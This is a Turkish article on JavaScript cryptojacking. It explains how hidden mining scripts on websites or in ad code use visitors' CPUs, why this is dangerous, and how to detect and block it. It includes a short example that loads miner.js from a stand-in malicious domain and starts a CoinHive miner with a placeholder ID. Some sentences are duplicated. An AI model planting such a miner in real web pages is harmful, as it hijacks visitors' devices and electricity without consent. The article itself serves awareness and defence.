Kripto para madenciliği (özellikle Monero ve Bitcoin türevleri), sadece cihazlara bulaşan zararlı yazılımlarla değil, aynı zamanda JavaScript içine gizlenen scriptlerle de yapılabilir.
Bu yöntemle site sahipleri ya da kötü niyetli saldırganlar, kullanıcıların farkında olmadan işlemci gücünü kullanarak madencilik yapmasını sağlar.
Bir web sitesine veya reklam scriptine JavaScript kodu gömülür.
Kullanıcı siteyi ziyaret ettiğinde tarayıcı bu kodu çalıştırır.
Kod, CPU/GPU gücünü kullanarak madencilik işlemleri yapar.
Elde edilen kripto para saldırganın cüzdanına aktarılır.
Örnek (Basitleştirilmiş Pseudo Kod):
Kullanıcı siteye girdiğinde CPU kullanımı %80-90’a çıkabilir.
✔ Sonuç: Arama sonuçlarında “Bu site bilgisayarınıza zarar verebilir” uyarısı çıkabilir.
✔ Çözüm: Kod temizliği yapılmalı, site yeniden taratılıp Google Search Console üzerinden Güvenlik Sorunları kısmından doğrulama istenmelidir.
Çözüm: Düzenli güvenlik taramaları, güvenilir eklenti/reklam kullanımı ve Cloudflare + WAF ile koruma.
Bu yöntemle site sahipleri ya da kötü niyetli saldırganlar, kullanıcıların farkında olmadan işlemci gücünü kullanarak madencilik yapmasını sağlar.
JavaScript ile Kripto Madenciliği Nasıl Yapılır?




Örnek (Basitleştirilmiş Pseudo Kod):
JavaScript:
<script src="https://kötüsiteler.com/miner.js"></script>
<script>
var miner = new CoinHive.Anonymous('KULLANICI_ID');
miner.start();
</script>

Neden Tehlikelidir?
- ⚠ Cihaz Performansını Düşürür → CPU/GPU aşırı ısınır, bilgisayar yavaşlar.
- ⚠ Enerji Tüketimini Artırır → Elektrik masrafı yükselir.
- ⚠ Kullanıcı Güvenini Zedeler → Siteniz kara listeye alınabilir.
- ⚠ SEO’ya Olumsuz Etki → Google, zararlı kod içeren siteleri “zararlı yazılım” olarak işaretleyip sıralamalardan düşürebilir.
JavaScript BTC Virüslerini Tespit Etme
Yöntem | Açıklama | Etkililik |
---|---|---|
CPU Kullanımı Takibi | Tarayıcıda %80+ CPU kullanımı varsa mining olabilir | ![]() ![]() ![]() |
Tarayıcı Eklentileri | uBlock Origin, NoCoin gibi script engelleyiciler | ![]() ![]() ![]() ![]() |
Google Search Console Uyarıları | “Zararlı yazılım bulundu” uyarısı | ![]() ![]() ![]() ![]() ![]() |
Kaynak Kodu Kontrolü | site kaynak kodunda coinhive , miner.js gibi scriptler aramak | ![]() ![]() ![]() ![]() |
JavaScript Madencilik Virüslerinden Korunma Yöntemleri
- Güvenilir Reklam Ağlarını Kullanın → Üçüncü parti zararlı reklam scriptlerinden uzak durun.
- Web Uygulama Güvenlik Duvarı (WAF) Kullanın → Cloudflare, Sucuri gibi güvenlik katmanları madencilik kodlarını filtreleyebilir.
- Dosya ve Kod Tarayıcıları Çalıştırın → Sitenizin kaynak kodunu düzenli tarayın.
- SEO İçin Temizlik Şarttır → Zararlı JavaScript barındıran siteler Google’da sandbox’a alınabilir.
- Tarayıcı Eklentileri Kullan → Kullanıcı olarak NoCoin, uBlock Origin gibi engelleyicilerle kendini koruyabilirsin.
SEO’ya Etkisi
✔ Olumsuz Etki: Zararlı JavaScript barındıran siteler, Google Safe Browsing tarafından işaretlenir.✔ Sonuç: Arama sonuçlarında “Bu site bilgisayarınıza zarar verebilir” uyarısı çıkabilir.
✔ Çözüm: Kod temizliği yapılmalı, site yeniden taratılıp Google Search Console üzerinden Güvenlik Sorunları kısmından doğrulama istenmelidir.
Sonuç
BTC virüsleri, JavaScript içine gömülerek kolayca tarayıcı üzerinden çalıştırılabilir.- Bu hem kullanıcıların cihazlarına zarar verir,
- Hem de sitenizin SEO’sunu olumsuz etkiler.
